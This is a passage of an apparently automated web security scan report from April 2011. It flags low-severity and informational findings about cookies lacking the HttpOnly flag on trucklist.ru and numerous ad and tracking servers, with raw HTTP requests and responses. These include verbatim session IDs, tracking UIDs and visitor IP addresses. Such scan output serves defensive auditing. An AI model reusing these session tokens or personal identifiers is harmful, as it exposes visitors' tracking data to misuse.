Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303734004

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:20:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2629f9017c7f7d7f31d4a3886871e1e7; path=/
Content-Type: image/jpeg
Content-Length: 5090

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

16.39. http://www.trucklist.ru/cars/trucks previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/cars/trucks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.40. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.41. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.42. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.43. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9xbg=eo7%3A85ej%3A1; rth=2-ljzkpb-eo7~85ej~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

16.44. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!#4!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#-B#!!!!#<wsc<!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#3pv!!!!#<wsc<!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsc<!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsc<!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#l)E!!!!#<wsc<!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsc<!#p]T!!!!#<wsc<!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsc<!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Wed, 24-Apr-2013 14:34:54 GMT
BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!#,!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:34:54 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#4!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#-B#!!!!#<wsc<!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#3pv!!!!#<wsc<!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsc<!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsc<!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#l)E!!!!#<wsc<!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsc<!#p]T!!!!#<wsc<!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsc<!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Wed, 24-Apr-2013 14:34:54 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=2fvbCJuz5gEQq5e67QM&guid=ON&script=0
Cache-Control: no-store
Last-Modified: Mon, 25 Apr 2011 14:34:54 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

16.45. http://an.yandex.ru/code/47934 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/code/47934

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

yabs-uvf=00000FxPbsm00000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:43:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwww.trucklist.ru%2Fcars%2Ftrucks%3Futm_source%3Dy_direct%26utm_medium%3Dcpc%26utm_campaign%3Dtruck%26_openstat%3DZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:43:31 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:43:31 GMT
Expires: Mon, 25 Apr 2011 14:43:31 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=00000FxPbsm00000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:43:31 GMT
Content-Length: 6232

var y5_sLinkHead = 'http://an.yandex.ru/count/Jd4i95txsC440000ZhE9MDi4XPwp2vQlAn7HaRXs6q01arIam00000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...

16.46. http://an.yandex.ru/code/57617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/code/57617

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

16.47. http://an.yandex.ru/code/66894 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/code/66894

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/66894?rnd=928638&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fpogoda.webalta.ru%2F&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:30 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:30 GMT
Expires: Mon, 25 Apr 2011 14:20:30 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:30 GMT
Content-Length: 3561

var y5_sLinkHead = 'http://an.yandex.ru/count/1QrEGmZSpqW40000ZhuoMDi4XPvK49Qke0McaRm8UAa3arIapW0000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...

16.48. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.49. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.50. http://b.dclick.ru/image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.dclick.ru
Path:	/image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

NGUserID=5f831c50-23276-1303741232-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
NGUserID=5f831c50-23276-1303741232-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554 HTTP/1.1
Host: b.dclick.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:20:32 GMT
Content-Type: application/x-netgravity
Connection: close
Set-Cookie: NGUserID=5f831c50-23276-1303741232-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
P3P: policyref="http://front2.imho.ru/w3c/policy.xml", CP="NON CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT DEM LOC"
Pragma: max-age=0
Set-Cookie: NGUserID=5f831c50-23276-1303741232-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
Content-Length: 0
Cache-control: no-cache
Location: http://i.dclick.ru/dot.gif
AdServer: ads1.imho.ru:9678:1
P3P: policyref="http://front2.imho.ru/w3c/policy.xml", CP="NON CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT DEM LOC"
Expires: Mon, 25 Apr 2011 14:20:31 GMT

16.51. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.52. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.53. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.54. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.mail.ru
Path:	/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.55. http://bw.pronto.ru/brick/5/167/36/30/125/&rnd=538045407 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brick/5/167/36/30/125/&rnd=538045407

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db5835aac8a9; expires=Thu, 19-Apr-2012 14:21:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/125/&rnd=538045407 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
